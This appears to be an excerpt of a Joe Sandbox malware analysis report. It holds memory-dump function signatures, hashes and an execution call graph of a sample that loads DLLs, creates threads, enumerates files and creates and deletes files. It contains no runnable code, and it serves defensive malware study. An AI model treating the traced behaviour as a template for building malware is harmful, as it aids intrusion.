                                  • Source File: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: d8ea9b1b00a5fc92996ce86aa369c1629ee5cbef3da9e892529cfe24b99f02da
                                  • Instruction ID: 3224f910365d869be75c04586cee9dd352aaf97588c770c57158c48882b116b9
                                  • Opcode Fuzzy Hash: d8ea9b1b00a5fc92996ce86aa369c1629ee5cbef3da9e892529cfe24b99f02da
                                  • Instruction Fuzzy Hash: 7E515476E0021AAFEF08CF98D848ADDBBB2BF58714F14802AE905BB250D7749942CF54
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                  • String ID:
                                  • API String ID: 4281723722-0
                                  • Opcode ID: 9bbbbd51bec80878438454bdcdbba5bab9b66032212b97e259a7c69a7129c4ee
                                  • Instruction ID: c6add486369f0371fae39fb3d906dbcb4a6fd50ba10fc7ca402c5a8f8b1b4023
                                  • Opcode Fuzzy Hash: 9bbbbd51bec80878438454bdcdbba5bab9b66032212b97e259a7c69a7129c4ee
                                  • Instruction Fuzzy Hash: 2E313875E04229AFCF29DFA8E858A9EBBF0FB58720F104129E512B7690D7359900CF94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 68b11d21276885b9d949ee70a76fd7188ed39c425080604c4144dcfff4625767
                                  • Instruction ID: 9f2605e50eafa56e294af011eb97370ad44057084d852064d8c0f83fb317ecea
                                  • Opcode Fuzzy Hash: 68b11d21276885b9d949ee70a76fd7188ed39c425080604c4144dcfff4625767
                                  • Instruction Fuzzy Hash: FF328D70D0026ADFDBA9CF68C984BEDBBB5BF08304F0081E9D969A7241D7745A84DF91
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                  • Instruction ID: d4820eab2bb6ab852c94421030934fb51605ee143af45afb99f96cb0fcd71517
                                  • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                  • Instruction Fuzzy Hash: A791B171E1021A9BEF2CDF6DC881ABEBBA5BF45720F14451AE975E72C0E73099408F52
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Bl$l
                                  • API String ID: 3446177414-208461968
                                  • Opcode ID: a8f25b702adbcb0f29a568c40a28165ee99c7b641cf87c780de9955482156a15
                                  • Instruction ID: 35b0f3dd692f09a95e46c198e6c72bfe1c424ca02e11b74e1ecc10bb93fda09f
                                  • Opcode Fuzzy Hash: a8f25b702adbcb0f29a568c40a28165ee99c7b641cf87c780de9955482156a15
                                  • Instruction Fuzzy Hash: 55A10A31B003298BEF39DB98E880BADB7B9BF44304F0540E9D589A7641CB76AD95CF51
                                  APIs
                                  • __startOneArgErrorHandling.LIBCMT ref: 01195E34
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  Similarity
                                  • API ID: ErrorHandling__start
                                  • String ID: pow
                                  • API String ID: 3213639722-2276729525
                                  • Opcode ID: 6ec4a6bce3d65ac48bfa4c70cbead1bd708628b694ae7e2e5ea05f251763fc60
                                  • Instruction ID: f34682304546c5f6499527bce85ba80e61242d22f4b05e38cc578ed39417ff38
                                  • Opcode Fuzzy Hash: 6ec4a6bce3d65ac48bfa4c70cbead1bd708628b694ae7e2e5ea05f251763fc60
                                  • Instruction Fuzzy Hash: 6251BD7090C20693DF6FBA1CF545BAD7FA1EB00710F14C92AE0F582299DB3584D4874B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: 0$Flst
                                  • API String ID: 0-758220159
                                  • Opcode ID: 8fc05875a49a951c995cb5d398605fd6a3573fdc227a16530458eacf01f20071
                                  • Instruction ID: d715854f18a5c03e4724267e58af7d237c5ed6d16624c28d0ae1a86cb8995196
                                  • Opcode Fuzzy Hash: 8fc05875a49a951c995cb5d398605fd6a3573fdc227a16530458eacf01f20071
                                  • Instruction Fuzzy Hash: B25197B1A0020A8BCF2ADF98C4847ADFBF4AF64718F15C12ED0199B641EB709981CF80
                                  APIs
                                  • RtlDebugPrintTimes.NTDLL ref: 0117D959
                                    • Part of subcall function 01154859: RtlDebugPrintTimes.NTDLL ref: 011548F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$$
                                  • API String ID: 3446177414-233714265
                                  • Opcode ID: d0e392d86d980a8a322414b913ff295fc34121ac812dd28bcc007717eb02fd21
                                  • Instruction ID: ca9b0200d8b350344f52436cfc6097a1fa6ab1be9209b36646befcebb86f447d
                                  • Opcode Fuzzy Hash: d0e392d86d980a8a322414b913ff295fc34121ac812dd28bcc007717eb02fd21
                                  • Instruction Fuzzy Hash: D251DF75A0424ADFDF2CDFE8E48879DBBB1BF48318F244159D5456B385D770A881CB80
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $
                                  • API String ID: 3446177414-3993045852
                                  • Opcode ID: 736882e215e150ae64563bd84d9c15f662489456abff6b6b0227838ebf9fa21b
                                  • Instruction ID: 690d6a9b2bb4b6bbc0d89f04c8dd5d4788263f2f85350192bf60767109030129
                                  • Opcode Fuzzy Hash: 736882e215e150ae64563bd84d9c15f662489456abff6b6b0227838ebf9fa21b
                                  • Instruction Fuzzy Hash: A741BF75A0021AABDF19DF99D880AEEBBB6FF58B04F15401DE904A7342C7709902CF90
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: 0$0
                                  • API String ID: 3446177414-203156872
                                  • Opcode ID: bdeeccee7ebc44e5e772a31c6b2f3337321c013202950e8af459ad93784ca242
                                  • Instruction ID: 8d4fce28ccb47501e253aa6b6cca5f7a3af45282aa605da2e321ba74d57d1be0
                                  • Opcode Fuzzy Hash: bdeeccee7ebc44e5e772a31c6b2f3337321c013202950e8af459ad93784ca242
                                  • Instruction Fuzzy Hash: 08418DB16087069FCB14CF68D584A1ABBE4BF88718F04492EF588DB341D771EA06CF96

                                  Execution Graph

                                  Execution Coverage:2.7%
                                  Dynamic/Decrypted Code Coverage:2.4%
                                  Signature Coverage:3%
                                  Total number of Nodes:927
                                  Total number of Limit Nodes:112
103386 4b4eb4 103388 4c4520 2 API calls 103386->103388 103390 4b4ed7 103386->103390 103387 4b4ccb 103387->103386 103414 4a3890 LdrLoadDll LdrInitializeThunk 103387->103414 103388->103390 103391 4b71f0 2 API calls 103390->103391 103392 4b4ef7 103390->103392 103391->103390 103415 4c5340 LdrLoadDll 103392->103415 103394->103374 103396 4c43be 103395->103396 103397 4c43f3 103395->103397 103398 4c5fc0 LdrLoadDll 103396->103398 103399 4c5fc0 LdrLoadDll 103397->103399 103401 4c43db 103398->103401 103400 4c4409 103399->103400 103416 2e739b0 LdrInitializeThunk 103400->103416 103401->103384 103402 4c4418 103402->103384 103405 4c4476 103404->103405 103406 4c4441 103404->103406 103408 4c5fc0 LdrLoadDll 103405->103408 103407 4c5fc0 LdrLoadDll 103406->103407 103409 4c445e 103407->103409 103410 4c448c 103408->103410 103409->103387 103417 2e74340 LdrInitializeThunk 103410->103417 103411 4c449b 103411->103387 103413->103376 103414->103386 103415->103369 103416->103402 103417->103411 103418 4bef50 103419 4bef59 103418->103419 103420 4b3f60 LdrLoadDll 103419->103420 103421 4bef88 103420->103421 103422 4c09c0 LdrLoadDll 103421->103422 103439 4bf18c 103421->103439 103423 4befb8 103422->103423 103424 4c09c0 LdrLoadDll 103423->103424 103425 4befd1 103424->103425 103426 4c09c0 LdrLoadDll 103425->103426 103427 4befea 103426->103427 103428 4c09c0 LdrLoadDll 103427->103428 103429 4bf006 103428->103429 103430 4c09c0 LdrLoadDll 103429->103430 103431 4bf01f 103430->103431 103432 4c09c0 LdrLoadDll 103431->103432 103433 4bf038 103432->103433 103434 4c09c0 LdrLoadDll 103433->103434 103435 4bf054 103434->103435 103436 4c09c0 LdrLoadDll 103435->103436 103437 4bf06d 103436->103437 103438 4c09c0 LdrLoadDll 103437->103438 103440 4bf085 103438->103440 103440->103439 103442 4beb10 LdrLoadDll 103440->103442 103442->103440 103443 4b6510 103444 4b653e 103443->103444 103445 4b7020 3 API calls 103444->103445 103446 4b6566 103445->103446 103447 4b656d 103446->103447 103450 4c6ee0 LdrLoadDll RtlAllocateHeap 
RtlFreeHeap 103446->103450 103449 4b657d 103450->103449 103451 4be9d0 103454 4bd650 103451->103454 103455 4bd676 103454->103455 103456 4b4240 LdrLoadDll 103455->103456 103457 4bd6cd 103456->103457 103458 4bd70d 103457->103458 103459 4b4240 LdrLoadDll 103457->103459 103464 4b7440 103458->103464 103459->103458 103461 4bd7f8 103462 4bd7f1 103462->103461 103469 4bd330 103462->103469 103465 4c09c0 LdrLoadDll 103464->103465 103466 4b745f 103465->103466 103467 4b7471 103466->103467 103468 4b7466 GetFileAttributesW 103466->103468 103467->103462 103468->103467 103470 4bd353 103469->103470 103492 4c1b70 103470->103492 103472 4bd3b5 103472->103462 103473 4bd360 103473->103472 103474 4bd37f 103473->103474 103475 4bd3c1 103473->103475 103476 4bd387 103474->103476 103477 4bd3a4 103474->103477 103480 4b4240 LdrLoadDll 103475->103480 103479 4c6dc0 2 API calls 103476->103479 103478 4c6dc0 2 API calls 103477->103478 103478->103472 103481 4bd398 103479->103481 103482 4bd3e3 103480->103482 103481->103462 103530 4bc670 103482->103530 103484 4bd405 103488 4bd508 103484->103488 103489 4bd41d 103484->103489 103485 4bd4ef 103486 4c6dc0 2 API calls 103485->103486 103487 4bd613 103486->103487 103487->103462 103488->103485 103536 4bcc90 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 103488->103536 103489->103485 103535 4bcc90 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 103489->103535 103493 4c1b7e 103492->103493 103494 4c1b85 103492->103494 103493->103473 103495 4b3f60 LdrLoadDll 103494->103495 103496 4c1bb7 103495->103496 103497 4c1bc6 103496->103497 103537 4c1640 LdrLoadDll 103496->103537 103499 4c6ea0 3 API calls 103497->103499 103501 4c1dc2 103497->103501 103500 4c1bdf 103499->103500 103500->103501 103502 4c1d6a 103500->103502 103503 4c1bf4 103500->103503 103501->103473 103504 4c1d74 103502->103504 103528 4c1cfc 103502->103528 103538 4bc790 LdrLoadDll 103503->103538 103539 4bc790 LdrLoadDll 103504->103539 103506 4c1c0b 103511 4c09c0 LdrLoadDll 103506->103511 103507 4c6dc0 2 API calls 
103507->103501 103509 4c1d8b 103540 4c0f10 LdrLoadDll 103509->103540 103513 4c1c27 103511->103513 103512 4c1da1 103514 4c09c0 LdrLoadDll 103512->103514 103515 4c09c0 LdrLoadDll 103513->103515 103514->103501 103516 4c1c43 103515->103516 103517 4c09c0 LdrLoadDll 103516->103517 103518 4c1c62 103517->103518 103519 4c09c0 LdrLoadDll 103518->103519 103520 4c1c7e 103519->103520 103521 4c09c0 LdrLoadDll 103520->103521 103522 4c1c9a 103521->103522 103523 4c09c0 LdrLoadDll 103522->103523 103524 4c1cb9 103523->103524 103525 4c09c0 LdrLoadDll 103524->103525 103526 4c1cd5 103525->103526 103527 4c09c0 LdrLoadDll 103526->103527 103527->103528 103528->103507 103529 4c1d61 103528->103529 103529->103473 103532 4bc686 103530->103532 103531 4bc693 103531->103484 103532->103531 103533 4c6dc0 2 API calls 103532->103533 103534 4bc6cc 103533->103534 103534->103484 103535->103489 103536->103488 103537->103497 103538->103506 103539->103509 103540->103512 103541 4b2cec 103542 4b6e80 3 API calls 103541->103542 103543 4b2cfc 103542->103543 103544 4b2d2a 103543->103544 103545 4b2d11 103543->103545 103546 4c4fe0 2 API calls 103543->103546 103549 4af770 LdrLoadDll 103545->103549 103546->103545 103548 4b2d1b 103549->103548 103550 4a9860 103551 4a986f 103550->103551 103552 4c09c0 LdrLoadDll 103551->103552 103554 4a9887 103552->103554 103553 4a98ad 103554->103553 103555 4a989a CreateThread 103554->103555 103556 4b9ce0 103561 4b9a10 103556->103561 103558 4b9ced 103581 4b96b0 103558->103581 103560 4b9cf3 103562 4b9a35 103561->103562 103563 4b4240 LdrLoadDll 103562->103563 103564 4b9ac5 103563->103564 103565 4b4240 LdrLoadDll 103564->103565 103566 4b9b24 103565->103566 103567 4b7440 2 API calls 103566->103567 103568 4b9b6b 103567->103568 103569 4b9b72 103568->103569 103570 4c1b70 4 API calls 103568->103570 103569->103558 103572 4b9b80 103570->103572 103571 4b9b89 103571->103558 103572->103571 103573 4b4240 LdrLoadDll 103572->103573 103574 4b9be9 103573->103574 103576 4b9c71 103574->103576 103593 4b9110 
103574->103593 103578 4b9cc9 103576->103578 103602 4b9470 103576->103602 103579 4c6dc0 2 API calls 103578->103579 103580 4b9cd0 103579->103580 103580->103558 103582 4b96c6 103581->103582 103587 4b96d1 103581->103587 103583 4c6ea0 3 API calls 103582->103583 103583->103587 103584 4b96e7 103584->103560 103585 4b7440 2 API calls 103585->103587 103586 4b99de 103588 4b99f7 103586->103588 103589 4c6dc0 2 API calls 103586->103589 103587->103584 103587->103585 103587->103586 103590 4b9110 3 API calls 103587->103590 103591 4b4240 LdrLoadDll 103587->103591 103592 4b9470 2 API calls 103587->103592 103588->103560 103589->103588 103590->103587 103591->103587 103592->103587 103594 4b9136 103593->103594 103595 4bc670 2 API calls 103594->103595 103596 4b919d 103595->103596 103598 4b9320 103596->103598 103600 4b91bb 103596->103600 103597 4b9305 103597->103574 103598->103597 103599 4b8fe0 3 API calls 103598->103599 103599->103598 103600->103597 103606 4b8fe0 103600->103606 103603 4b9496 103602->103603 103604 4bc670 2 API calls 103603->103604 103605 4b9512 103604->103605 103605->103576 103607 4b8ff6 103606->103607 103610 4bcb70 103607->103610 103609 4b90fe 103609->103600 103611 4bcbad 103610->103611 103612 4bcc5d 103611->103612 103614 4bcc00 103611->103614 103617 4bdc70 103611->103617 103612->103609 103615 4bcc39 103614->103615 103616 4c6dc0 2 API calls 103614->103616 103615->103609 103616->103615 103620 4bd970 103617->103620 103619 4bdc84 103619->103614 103621 4bd996 103620->103621 103622 4c6d30 2 API calls 103621->103622 103624 4bd9b9 103621->103624 103622->103624 103623 4bdc61 103623->103619 103624->103623 103625 4b4240 LdrLoadDll 103624->103625 103632 4bdaaa 103624->103632 103626 4bdb26 103625->103626 103627 4b4240 LdrLoadDll 103626->103627 103627->103632 103628 4bdc43 103629 4c6dc0 2 API calls 103628->103629 103631 4bdc53 103629->103631 103631->103619 103632->103623 103632->103628 103633 4ab3d0 103632->103633 103634 4c6d30 2 API calls 103633->103634 103635 4aca41 103634->103635 
103635->103628 103636 4c3ce0 103637 4c3d3a 103636->103637 103639 4c3d47 103637->103639 103640 4c2290 103637->103640 103641 4c6d30 2 API calls 103640->103641 103643 4c22d1 103640->103643 103641->103643 103642 4c23c6 103642->103639 103643->103642 103644 4b3f60 LdrLoadDll 103643->103644 103645 4c2311 103644->103645 103646 4c09c0 LdrLoadDll 103645->103646 103648 4c2332 103646->103648 103647 4c2340 Sleep 103647->103648 103648->103642 103648->103647 103649 4c4f60 103650 4c4f7e 103649->103650 103651 4c4faf 103649->103651 103653 4c5fc0 LdrLoadDll 103650->103653 103652 4c5fc0 LdrLoadDll 103651->103652 103654 4c4fc5 NtDeleteFile 103652->103654 103655 4c4f9b 103653->103655 103656 4c0520 103657 4c053c 103656->103657 103668 4c4cd0 103657->103668 103660 4c0578 103663 4c4fe0 2 API calls 103660->103663 103661 4c0564 103662 4c4fe0 2 API calls 103661->103662 103664 4c056d 103662->103664 103665 4c0581 103663->103665 103672 4c6ee0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 103665->103672 103667 4c058c 103669 4c4ced 103668->103669 103670 4c5fc0 LdrLoadDll 103669->103670 103671 4c055d 103670->103671 103671->103660 103671->103661 103672->103667 103673 4c45a0 103674 4c45be 103673->103674 103675 4c45ff 103673->103675 103677 4c5fc0 LdrLoadDll 103674->103677 103676 4c5fc0 LdrLoadDll 103675->103676 103678 4c4615 103676->103678 103679 4c45db 103677->103679 103682 2e72ee0 LdrInitializeThunk 103678->103682 103680 4c4630 103682->103680 103683 2e72ad0 LdrInitializeThunk 103684 4b89b1 103692 4b89c0 103684->103692 103685 4b89c7 103686 4c09c0 LdrLoadDll 103686->103692 103687 4b8aac GetFileAttributesW 103687->103692 103688 4b8c5a 103689 4b8c73 103688->103689 103690 4c6dc0 2 API calls 103688->103690 103690->103689 103691 4b4240 LdrLoadDll 103691->103692 103692->103685 103692->103686 103692->103687 103692->103688 103692->103691 103693 4bc670 2 API calls 103692->103693 103696 4c18a0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 103692->103696 103697 4c1740 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 
103692->103697 103693->103692 103696->103692 103697->103692 103698 4be670 103699 4be6d4 103698->103699 103700 4b4240 LdrLoadDll 103699->103700 103701 4be7c7 103700->103701 103702 4b5a60 3 API calls 103701->103702 103704 4be7fd 103702->103704 103703 4be804 103704->103703 103705 4b4240 LdrLoadDll 103704->103705 103706 4be840 103705->103706 103707 4b5b70 2 API calls 103706->103707 103709 4be880 103707->103709 103708 4be9a3 103709->103708 103710 4be9b2 103709->103710 103732 4be450 103709->103732 103711 4c4fe0 2 API calls 103710->103711 103713 4be9bc 103711->103713 103714 4be8b5 103714->103710 103715 4be8c0 103714->103715 103716 4c6ea0 3 API calls 103715->103716 103717 4be8e9 103716->103717 103718 4be908 103717->103718 103719 4be8f2 103717->103719 103761 4be340 CoInitialize 103718->103761 103720 4c4fe0 2 API calls 103719->103720 103722 4be8fc 103720->103722 103723 4be916 103763 4c4b40 103723->103763 103725 4be992 103726 4c4fe0 2 API calls 103725->103726 103727 4be99c 103726->103727 103729 4c6dc0 2 API calls 103727->103729 103729->103708 103730 4be934 103730->103725 103731 4c4b40 2 API calls 103730->103731 103769 4be270 LdrLoadDll RtlFreeHeap 103730->103769 103731->103730 103733 4be46c 103732->103733 103734 4b3f60 LdrLoadDll 103733->103734 103736 4be487 103734->103736 103735 4be490 103735->103714 103736->103735 103737 4c09c0 LdrLoadDll 103736->103737 103738 4be4ad 103737->103738 103739 4c09c0 LdrLoadDll 103738->103739 103740 4be4c8 103739->103740 103741 4c09c0 LdrLoadDll 103740->103741 103742 4be4e1 103741->103742 103743 4c09c0 LdrLoadDll 103742->103743 103744 4be4fd 103743->103744 103745 4c09c0 LdrLoadDll 103744->103745 103746 4be516 103745->103746 103747 4c09c0 LdrLoadDll 103746->103747 103748 4be52f 103747->103748 103749 4b3f60 LdrLoadDll 103748->103749 103750 4be55b 103749->103750 103751 4c09c0 LdrLoadDll 103750->103751 103760 4be60d 103750->103760 103752 4be583 103751->103752 103753 4b3f60 LdrLoadDll 103752->103753 103754 4be5b8 103753->103754 103755 4c09c0 
LdrLoadDll 103754->103755 103754->103760 103756 4be5db 103755->103756 103757 4c09c0 LdrLoadDll 103756->103757 103758 4be5f4 103757->103758 103759 4c09c0 LdrLoadDll 103758->103759 103759->103760 103760->103714 103762 4be3a5 103761->103762 103762->103723 103764 4c4b5a 103763->103764 103765 4c5fc0 LdrLoadDll 103764->103765 103766 4c4b6b 103765->103766 103770 2e72ba0 LdrInitializeThunk 103766->103770 103767 4c4b8a 103767->103730 103769->103730 103770->103767 103771 4b66b0 103772 4b66cc 103771->103772 103776 4b67af 103771->103776 103774 4c4fe0 2 API calls 103772->103774 103772->103776 103773 4b6845 103775 4b66e7 103774->103775 103785 4b5cf0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 103775->103785 103776->103773 103786 4b5cf0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 103776->103786 103778 4b681f 103778->103773 103787 4b5ec0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 103778->103787 103781 4b671f 103782 4b4240 LdrLoadDll 103781->103782 103783 4b674c 103782->103783 103784 4b4240 LdrLoadDll 103783->103784 103784->103776 103785->103781 103786->103778 103787->103773 103788 4bc1f0 103789 4bc212 103788->103789 103790 4b4240 LdrLoadDll 103789->103790 103791 4bc403 103790->103791 103792 4b4240 LdrLoadDll 103791->103792 103793 4bc428 103792->103793 103794 4b4180 LdrLoadDll 103793->103794 103795 4bc43c 103794->103795 103819 4bc0b0 103795->103819 103798 4bc0b0 7 API calls 103799 4bc4b2 103798->103799 103800 4bc0b0 7 API calls 103799->103800 103801 4bc4ca 103800->103801 103802 4bc0b0 7 API calls 103801->103802 103803 4bc4e2 103802->103803 103804 4bc0b0 7 API calls 103803->103804 103805 4bc4fd 103804->103805 103806 4bc0b0 7 API calls 103805->103806 103808 4bc515 103806->103808 103807 4bc52f 103808->103807 103809 4bc0b0 7 API calls 103808->103809 103810 4bc563 103809->103810 103811 4bc0b0 7 API calls 103810->103811 103812 4bc5a0 103811->103812 103813 4bc0b0 7 API calls 103812->103813 103814 4bc5dd 103813->103814 103815 4bc0b0 7 API calls 
103814->103815 103816 4bc61a 103815->103816 103817 4bc0b0 7 API calls 103816->103817 103818 4bc657 103817->103818 103820 4bc0d9 103819->103820 103821 4c09c0 LdrLoadDll 103820->103821 103822 4bc116 103821->103822 103823 4c09c0 LdrLoadDll 103822->103823 103824 4bc134 103823->103824 103825 4c09c0 LdrLoadDll 103824->103825 103827 4bc156 103825->103827 103826 4bc1dc 103826->103798 103827->103826 103828 4bc180 FindFirstFileW 103827->103828 103828->103826 103832 4bc19b 103828->103832 103829 4bc1c3 FindNextFileW 103830 4bc1d5 FindClose 103829->103830 103829->103832 103830->103826 103832->103829 103833 4bbfc0 7 API calls 103832->103833 103833->103832 103834 4b51f0 103835 4b71f0 2 API calls 103834->103835 103836 4b5220 103835->103836 103838 4b524c 103836->103838 103839 4b7170 103836->103839 103847 4c4310 103839->103847 103841 4b71b4 103842 4b71d5 103841->103842 103854 4c44a0 103841->103854 103842->103836 103844 4b71c5 103845 4b71e1 103844->103845 103846 4c4fe0 2 API calls 103844->103846 103845->103836 103846->103842 103848 4c432e 103847->103848 103849 4c436b 103847->103849 103850 4c5fc0 LdrLoadDll 103848->103850 103851 4c5fc0 LdrLoadDll 103849->103851 103853 4c434b 103850->103853 103852 4c4381 103851->103852 103852->103841 103853->103841 103855 4c44f6 103854->103855 103856 4c44c1 103854->103856 103857 4c5fc0 LdrLoadDll 103855->103857 103858 4c5fc0 LdrLoadDll 103856->103858 103859 4c450c 103857->103859 103860 4c44de 103858->103860 103863 2e74650 LdrInitializeThunk 103859->103863 103860->103844 103861 4c451b 103861->103844 103863->103861 103864 4c08b0 103868 4c08b4 103864->103868 103865 4c0949 103866 4c0906 103867 4c6dc0 2 API calls 103866->103867 103869 4c0913 103867->103869 103868->103865 103868->103866 103870 4c0944 103868->103870 103871 4c6dc0 2 API calls 103870->103871 103871->103865 103872 4c4d70 103873 4c4d8e 103872->103873 103874 4c4de7 103872->103874 103875 4c5fc0 LdrLoadDll 103873->103875 103876 4c5fc0 LdrLoadDll 103874->103876 103878 4c4dab 103875->103878 103877 
4c4dfd NtCreateFile 103876->103877

                                  Control-flow Graph 4a98c0-4a9c9f (legend: Executed / Not Executed)
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: D$#k$%$'$'\$+!$,B$-|$/$0$3$9$:[$<$=$>$A$LO$P$V-$\3$]4$ch$eT$f$k$l$lg$q$tA$wJ$4$5$F
                                  • API String ID: 0-715490789
                                  • Opcode ID: 12b19ddffbc0dbbffbfd98f83fffe68fffd269e9319a4e358e557fcdbd1feb64
                                  • Instruction ID: ad3550e170ea8038da4351236bd4ae0348f868fc8b6ff88e03ae33a2d60162f0
                                  • Opcode Fuzzy Hash: 12b19ddffbc0dbbffbfd98f83fffe68fffd269e9319a4e358e557fcdbd1feb64
                                  • Instruction Fuzzy Hash: EB329CB0D05268CBEB64CF44C998BDDBBB2BB55308F1081DAD4096B280C7B95ED9CF59
                                  APIs
                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 004BC191
                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 004BC1CE
                                  • FindClose.KERNELBASE(00000000), ref: 004BC1D9
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 3541575487-0
                                  • Opcode ID: 4b3003cf327491efddb4a02cebe8bf0de7a5893ca6bf1177a5a2ace0b08016f4
                                  • Instruction ID: 1578ad28605df75776caad1d6b675ed8fa00c06c7ac978f13bb0478d4b61c698
                                  • Opcode Fuzzy Hash: 4b3003cf327491efddb4a02cebe8bf0de7a5893ca6bf1177a5a2ace0b08016f4
                                  • Instruction Fuzzy Hash: B431A5B5900308BFDB20DB65CC85FFB777C9B84709F14455EB908A7182DA78AA858FA4
                                  APIs
                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 004C4E2E
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
